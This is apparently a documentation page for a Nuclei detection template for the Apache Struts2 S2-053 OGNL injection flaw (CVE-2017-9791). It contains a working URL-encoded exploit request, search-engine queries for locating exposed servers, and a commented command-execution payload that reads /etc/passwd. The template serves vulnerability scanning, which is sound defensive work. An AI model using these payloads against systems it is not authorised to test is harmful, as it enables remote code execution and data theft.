Skip to content
Nuclei Templates

Apache Struts2 S2-053 - Remote Code Execution

ID: CVE-2017-9791

Severity: critical

Author: pikpikcu

Tags: cve2017,cve,apache,rce,struts,kev

Description

Section titled “Description”

Apache Struts 2.1.x and 2.3.x with the Struts 1 plugin might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.

YAML Source

Section titled “YAML Source”
id: CVE-2017-9791


info:
  name: Apache Struts2 S2-053 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: |
    Apache Struts 2.1.x and 2.3.x  with the Struts 1 plugin might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.
  impact: |
    Remote code execution
  remediation: |
    Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2.
  reference:
    - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html
    - http://struts.apache.org/docs/s2-048.html
    - http://web.archive.org/web/20211207175819/https://securitytracker.com/id/1038838
    - http://www.securitytracker.com/id/1038838
    - https://security.netapp.com/advisory/ntap-20180706-0002/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-9791
    cwe-id: CWE-20
    epss-score: 0.97448
    epss-percentile: 0.99947
    cpe: cpe:2.3:a:apache:struts:2.3.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: struts
    shodan-query:
      - title:"Struts2 Showcase"
      - http.title:"struts2 showcase"
      - http.html:"struts problem report"
      - http.html:"apache struts"
    fofa-query:
      - title="Struts2 Showcase"
      - title="struts2 showcase"
      - body="apache struts"
      - body="struts problem report"
    google-query: intitle:"struts2 showcase"
  tags: cve2017,cve,apache,rce,struts,kev
variables:
  num1: "{{rand_int(40000, 44800)}}"
  num2: "{{rand_int(40000, 44800)}}"
  result: "{{to_number(num1)*to_number(num2)}}"


# CMD: %{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream())).(#q)}
http:
  - method: POST
    path:
      - "{{BaseURL}}/integration/saveGangster.action"


    body: |
      name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%28{{num1}}%2a{{num2}}%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=


    headers:
      Content-Type: application/x-www-form-urlencoded


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{result}}"
          - "added successfully"
        condition: and


      - type: status
        status:
          - 200
# digest: 4a0a00473045022003b87b688febcbd9a6ae5a47e55cae6d6458e72331a6cdd9e9aa10b2f1a519c5022100b9e1a168ad4de4a512efbd0797018f62b2b7d1e907afb5330c72f7892b6e6fe7:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-9791.yaml"

View on Github